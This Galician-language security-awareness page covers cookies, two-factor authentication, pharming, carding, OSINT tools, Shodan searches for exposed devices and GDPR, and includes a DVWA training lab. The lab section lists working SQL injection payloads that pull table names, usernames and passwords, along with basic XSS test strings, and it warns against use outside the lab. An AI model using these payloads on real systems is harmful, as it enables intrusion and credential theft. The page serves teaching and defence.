Artigos novos
Archive for 2018
As cookies (galletiñas en inglés), son ficheiros de texto sen formato que se descargan nos nosos propios navegadores tanto ordenadores como dispositivos móbiles (tabletas, smartphones, outros dispositivos) ao acceder a determinadas páxinas web.
Estes arquivos empréganos o sitio web que visitamos para ver se é a primeira vez que se accede ou xa se é usuario habitual, por exemplo. Por iso cando visitamos unha páxina web da que xa somos usuarios ou usuarias recoñécenos e aparecemos xa logueados, porque gardan os datos de rexistro e os datos de acceso.
Tamén permiten gardar as opcións ou preferencias de navegación como o idioma ou outros axusten que permitan navegar dun xeito máis eficiente. As cookies están moi ligadas ao tema da nosa privacidade, non son tanto un risco de seguridade como unha fonte de información para terceiros, aínda que tamén poidan ter beneficios para nós.
Estes arquivos empréganos o sitio web que visitamos para ver se é a primeira vez que se accede ou xa se é usuario habitual, por exemplo. Por iso cando visitamos unha páxina web da que xa somos usuarios ou usuarias recoñécenos e aparecemos xa logueados, porque gardan os datos de rexistro e os datos de acceso.
Tamén permiten gardar as opcións ou preferencias de navegación como o idioma ou outros axusten que permitan navegar dun xeito máis eficiente. As cookies están moi ligadas ao tema da nosa privacidade, non son tanto un risco de seguridade como unha fonte de información para terceiros, aínda que tamén poidan ter beneficios para nós.
Moitas tendas online e outros servizos web con publicidade empregan as cookies para obter estatísticas dos seus clientes ou para ofrecerlles produtos orientados ás súas preferencias e gustos. As cookies gárdanse sempre no noso propio ordenador, pero así tamén as poderemos borrar, ver canto ocupan, limitar o espazo adicado a elas e ter un pouco de control sobre o que esta pasando (sempre que saibamos que son).
Temos dous tipos de cookies:
• Cookies de orixe. Resultan beneficiosas para o usuario, xa que aforran ter que inserir os datos de acceso (usuario e contrasinal) ao acceder a un sitio web. Non teñen riscos para a privacidade posto que só se activan ao visitar un sitio web, polo que se poden aceptar.
• Cookies de terceiros. Engádeas unha páxina web ou banner para obter estatísticas e rexistrar que sitios web visitamos. Estas cookies non nos aportan nada como usuarios (agás publicidade enfocada ás nosas preferencias) e por tanto poderíamos bloquealas sen que nos afectara. Aínda que transmitan información a terceiros non son malware ou spyware como tal xa que son arquivos de texto e por tanto non conteñen código malicioso.
A lexislación española obriga aos sitios web a informar de se están a empregar cookies de aí que ao entrar en moitas web nos saía un pequeno aviso que debemos aceptar para continuar a navegación informándonos do seu uso.
Realmente o seu uso conleva certos problemas ou riscos:
Realmente o seu uso conleva certos problemas ou riscos:
• Cando as cookies non nos aportan nada como usuarios ocupan espazo en disco de forma innecesaria.
• Aínda que non conteñen información persoal, son datos sensibles (usuario e contrasinal, etc), que poden ser recollidos sen a nosa autorización.
• Se accedemos a dispositivos compartidos, por exemplo en sitios públicos, quedamos expostos a que outras persoas que accedan ao equipo entren en páxinas e servizos web cos noso datos de acceso almacenadas nas cookies ou espíe a información que almacenan.
Como configurar e acceder ás cookies
As cookies pódense bloquear ou eliminar mediante as opcións e preferencias de cada navegador, hai que ter en conta que as cookies do Firefox son distintas as do Chrome. A forma de acceder ás cookies é diferente en cada navegador:
• Para máis información sobre o navegador Chrome: Google Chrome
• Para máis información sobre o navegador Firefox: Mozilla Firefox Deshabilitar cookies de terceiros
• Para máis información sobre o navegador Explorer: Internet Explorer
• Para máis información sobre o navegador Safari: Safari
• Para máis información sobre o navegador Opera: Opera
Utilidades
Exemplos
ATRESPlayer eBay Oracle Páginas Amarillas randstad vertele wallapop
Hola Lecturas Quo Saber Vivir Semana Wallapop
configurar android da forma máis segura actualizar as aplicacións
cómo actualizar cómo actualizar Android á súa última versión
centro de seguridade Google control parental
elixe o tipo de seguridade para o bloqueo da pantalla Antivirus informe Antivirus
por qué e cómo configurar unha VPN
Navegadores (Privacidade)
brave bloqueo de seguimentos, publicidade e scripts (tamén en Android e iPhone)
epic privace browser navegador con orixe Chromium que bloquea o criptominado oculto, a publicidade e tecnoloxías de rastreo. Ten a súa propia VPN para evitar a nosa xeolocalización e emprega proxy para evitar o rastrexo.
SRWare Iron navegador con orixe Chromium, bloquea a publicidade, elimina as opcións de rastrexo e seguemento e permite simular que nos conectamos con outro dispositivo
Tor Browser os sitios webs non saberán a nosa dirección IP e tampouco dende onde nos conectamos
Conectarmos mediante unha versión adaptada de Firefox e unha app que nos conectará cos proxys externos. Documentación de Tor
actualizacións Microsoft Windows
operacións de banca online
Verificación en dous pasos
Despois de introducir o usuario e contrasinal para iniciar sesión nunha aplicación ou servizo necesitaremos confirmar que somos nós utilizando un código adicional
Facebook verificación en dous pasos Google Google Instagram
Microsoft / Outlook Apple Amazon Autodesk Dropbox eBay
verificación de inicio de sesión en Twitter LinkedIn
clave de seguridade de PayPal autenticación en dous factores en PayPal
en WhatsApp temos que ir a Axustes, conta, Verificación en dous pasos
PlayStation
Solucións - INCIBE
servizo antibotnet servizo antiransomware
¿sabes cómo se protexen as empresas do teu sector? RXPD para pemes
¿coñeces os teus riscos? políticas de seguridade Kit de concienciación
RXPD para pequenas e medianas empresas Plan Director de seguridade
boas prácticas protexe @s client@s
desenvolver cultura en seguridade fraude e xestión da identidade online
contramedidas electrónicas cumplimento legal
protección da información protección do posto de traballo
protexe a túa web
protección en mobilidade e conexións inalámbricas
plan de continxencia e continuidade de negocio
Shodan detecta calquer dispositivo que se conecta a internet con configuracións vulnerables ou de fábrica. Para obter resultados sen limitacións deberase pagar unha cuota. Un buscador para detectar fugas de información
o buscador favorito
o teu dispositivo en internet expoñendo a privacidade no IoT títulos en HTMLo buscador favorito
backups de vidas online cámaras Wi-Fi sistemas de control escritorio remoto
cómo averiguar números de teléfono cidades expostas
comproba os teus dispositivos vulnerables guía de boas prácticas de seguridade
sistemas industriais PCL
conta Twitter do fundador
¿qué é? crear alertas (de pago)
interface liña de comandos exploits developer Mapas
ICS barcos versión simple
Exposición por países España USA Portugal
información aleatoria sobre un dispositivo IoT vulnerable conectado
Exemplos
dispositivos con captura de pantalla habilitada cámaras netcam webcam
Android
hostname nomes persoas
devasas web
routers con almacenamento USB servidores VNC sen autenticación
ICS / SCADA SCADA PCWork
Paneis de Control servidores web con interface Web
CPanel (2082, 2083) WHM (2086, 2087) Webmin (1000)
Drones FMV
Proveedor de Servizos de Internet
Parques eólicos
Informes
vulnerables a Heartbleed D-Link Smart TV Fire TV Kodi
Maltego
censys só permite 10 búsquedas diarias sen rexistrar
censys exemplos guía de seguridade
o poder da información SCADA cámaras ip
bases de datos impresoras impresoras sen contrasinais modelos de impresoras
modelos impresoras
ZoomEye webcams
Contramedidas
cómo evitar que os teus dispositivos se usen en ciberataques IoT Scanner
6 consellos para protexer a seguridade das webcams
medidas a adoptar
DVWA
é unha aplicación web PHP e MySQL para o entrenamento de explotación de vulnerabilidades web nun entorno controlado e de maneira legal
DVWA DVWA online default login: admin - password
Se queremos modificar o directorio de destino teremos que modificar dentro do arquivo httpd.conf ( c:\wamp\bin\apache\Apachexx\conf )
os parámetros:
DocumentRoot e Directory Cómo configurar sitios web en WampServer
Temos que ir ao directorio c:\wamp\www\DVWA\config e renomear o arquivo como config.inc.php e renomear a entrada db_password como ='';
e finalmente pulsar o botón "crear a base de datos"
Para poder executar DVWA correctamente debemos realizar as seguintes accións:
1.- Arrancar o servidor Apache: service apache2 start
2.- Arrancar o motor da base de datos: service mysql start
3.- Acceder á ruta da aplicación web vulnerable: localhost/dvwa ou 127.0.0.1/dvwa/
DVWA Security: low
(Só utilizar en DVWA para fins académicos e aprendizaxe.
NUNCA utilizar en ningunha páxina web sen autorización xa que poderá supoñer problemas legais)
Exemplos
SQL Injection: ' or 1=1# 1' UNION SELECT 1,2#
1' UNION SELECT 1,(select database());#
1' UNION SELECT 1,group_concat(schema_name) FROM information_schema.schemata;#
se ao teclear www.paxinaproba.com/index.php?id=2' a web será vulnerable se mostra un erro similar a este: You have an error in your SQL syntax;
se probamos a poñer un número calquera amósanos o ID, o nome e o apelido, polo tanto poderíamos saber cantos usuarios ten a base de datos.
(Neste caso sabemos que a base de datos ten 5 usuarios porque se poñemos 6 ou un número maior non devolve nada)
Sabemos que ten 2 columnas porque ao poñer a seguinte da erro: 1' and 1=0 order by 3 #
Confirmámolo, inxectando algo nas 2 columnas: 1' and 1=0 union select 1,2 #
Tamén podemos inxectar unha cadea de caracteres:
1' and 1=0 union select 'Boas','Estamos de PROBAS' #
versión da base de datos: 1' and 1=0 union select null,Version() #
tamén funciona: ' union select null, @@version #
nome da base de datos: 1' and 1=0 union select null,database() #
' union select null, database() #
Hostname: ' union select null, @@hostname #
Usuario: ' union all select current_user(), user() #
' union all select system_user(), user() #
nomes das tablas: (sabemos así que existe unha tabla "users")
1' and 1=0 union select null,table_name from information_schema.tables where table_schema!='msql' and table_schema!='information_schema'#
1' and 1=1 union select null, table_name from information_schema.tables #
nomes dos usuarios:
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'#
' union select null, column_name from information_schema.columns where table_name = 'users' #
usuarios e contrasinais: 1' and 1=0 union select null,concat(user,0x0a,password) from users #
1' and 1=1 union select user, password from users #
XSS Reflected: (para practicar XSS nunha aplicación web)
<script>alert('de proba')</script>
XSS Stored: (formulario web)
en Mensaxe teclear: <script>alert('CeMIT, Cuntis')</script>
É o método utilizado para realizar ataques de phishing, redirixindo o nome de dominio (DNS) dunha entidade de confianza a unha páxina web, en apariencia idéntica, pero que en realidade foi creada pola persoa atacante para obter os datos privados del usuario como poden ser os datos bancarios.
Cando unha persoa teclea unha dirección no seu navegador, ésta ten que ser convertida a unha dirección IP numérica. Este proceso chámase resolución de nomes. Este proceso faranno os servidores DNS.
O problema é que existen exemplares de malware deseñados para modificar o sistema de resolución de nomes local, ubicado nun arquivo chamado HOSTS que permite almacear localmente dita resolución de nombres asociadas a direccións IP.
Os ataques mediante pharming realízanse de 2 formas:
.- directamente ós servidores DNS, afectando a tódolos usuarios.
.- atacando a ordenadores concretos, mediante a modificación do arquivo HOSTS.
O pharming non se executa nun momento concreto. Executarase cando a persoa usuaria acceda ao seu servizo bancario. Nese intre fará uso das direccións falseadas gardadas no arquivo HOSTS.
Consellos
Instalar antimalware e antivirus en tódolos dispositivos.
Non acceder a sitios web sospeitosos e non pulsar en ligazóns de correos electrónicos sospeitosos.
Verificar que os sitios webs visitados, en particular os que conteñan información persoal ou financiera, sexan https
Evitar páxinas web con raras apariencias.
Non dar datos persoais de forma xeralizada.
Uso ou xeración ilexítimo das tarxetas de crédito (ou os seus números), pertenecentes a outras persoas co fin de obter bens realizando fraude con elas. Relaciónase moito con malas prácticas do cracking ou hacking mediante os cales se conseguen os números das tarxetas.
O seu obxectivo será facerse cos datos numéricos da tarxeta, incluido o de verificación.
Pode realizarse a través do teléfono ( un operador intenta convencernos para que lles demos o noso número de tarxeta de crédito) ou a través de internet (recibiendo un correo electrónico fraudulento en el que nos solicitan estos datos).
Os importes das compras serán pequenos e secuenciais para intentar evitar levantar sospeitas e que sexa máis difícil darse conta de que está ocurrindo dita estafa.
Consellos
NUNCA dar os nosos datos bancarios por teléfono.
Nunca abrir correos nos que pidan os nosos datos financieiros ou personais.
Temos que ter en conta que as empresas emisoras de tarxetas de crédito NUNCA enviarán un correo electrónico ou mensaxes por móbil solicitando o número de tarxeta de cliente, a data de expiración, nin o código de seguridade da mesma.
¿canto valen os nosos datos personais?
Conseguir información privada a partires da recuperación de arquivos, directorios, documentos e/ou contrasinais enviados ó lixo.
Se a información se recolle de discos duros e/ou papeis falamos de trashing físico.
Cando se consegue información revisando os arquivos do ordenador (arquivos de cookies, historial de navegación, lixo), chámase trashing lóxico.
Se a información se recolle de discos duros e/ou papeis falamos de trashing físico.
Cando se consegue información revisando os arquivos do ordenador (arquivos de cookies, historial de navegación, lixo), chámase trashing lóxico.
Intelixencia de fontes abertas (Coñecemento recopilado a partires de fontes de acceso público)
Documentación
a información é poder
All In One
libro - i-intelligence Taller de creación de tools de intelixencia
Tinfoleak
Utilidades
aprende xogando
recursos ordeados por temáticas
atopar correos electrónicos atopar enderezos electrónicos
búsqueda inversa por enderezo electrónico Email Permutator
analizar encabezado enderezo electrónico
Dominios Domain Big Data
buscar dominios aloxados nunha IP - buscar dominios - (non funciona con tódalas direccións)
Google Dataset Search motor de búsqueda para facilitar o descubremento de bases de datos gubernamentais, medioambientais ou sociais.
,
Facebook Graph Search
ferramentas redes sociais ferramentas e cómo aprender a usalas
Social Buzz ViewDNS
Buscar negocios
cambiar a mbasic e pulsar en reproducir vídeo
yooying instasave InstaDP StorySaver weynstag
picpanzee
tvd
Buscar imaxes
Baidu Pictures Bing Google The Wolfram Language Image Identification Project
Flickr Karma Decay TinEye Yahoo! Yandex
Cámaras
Open Street Cam
Lugares
GeoNames
Mapas
Satellites Pro Descartes Digital Globe
Vóos
ADS-B Exchange AirNav RadarBox FlightAware escoitar tráfico aéreo
flightRadar24
Criptomoedas
as 100 principais
History Search - extensión para sacarlle todo o proveito ó teu historial de navegación
mapa mental
Search Carrot - metabuscador que representa os resultados de forma gráfica
rastrear vídeos publicados - YASIV
recoñecemento facial
Show Facebook Computer Vision Tags Chrome Extension - Extensión de Chrome para Facebook, que permite interpretar o contido das imaxes mediante un sistema de redes neuronais
búsqueda visual en Snapchat
Social Media Intelligence Dashboard
ver eventos, novas, localizacións, que persoas usuarias de SnapChat comparten
recursos repositorio con ferramentas recoñecemento facial
Distros
Buscador listaxe
HURON OSINTux Tsurugi WeakNet
Google - Revisión de Privacidade e Revisión de Seguridade revisar seguridade - google
Privacidade e condicións - Google administrar controis de privacidade
cómo acceder á configuración das cookies de Google Chrome:
fai clic no menú de Chrome.
Selecciona Configuración > Configuración de sitios web.
Podes comprobar a configuración na primera sección, titulada Cookies.
cómo configurar a conta de Google Analytics
guía privacidade Facebook lista de amigos mellora a túa seguridade e privacidade en 5 pasos
Twitter WordPress Guía para WordPress
¿Qué é o GDPR? EDPB información GDPR claves GDPR
corrección de erros
protección de datos de carácter persoal - BOE RXPD
Regulamento Xeral de Protección de Datos todo o que debes saber
as claves en 9 puntos
decálogo dereitos
Delegado de Protección de Datos
Documentación - Regulamentos - LOPD
¿qué pasa cos nosos datos?
o que necesitas saber
protección de datos - novidades - OSI
Privacy Shield Framework certificación de privacidade
Axencia Española de Protección de Datos
guía modelos guía para responsable de ficheiros
adapta o teu centro educativo
adaptación de textos legais web
CEOE analiza o impacto
cómo adaptar a túa web
cómo preparar os formularios para o novo regulamento de protección de datos
cómo adaptar blog
Guías
guía sobre o consentimento válido
guía - AGPD
Infografías
6 consellos
7 claves
adáptese rápidamente
a protección de datos nun día calquera
regulamento sobre protección de datos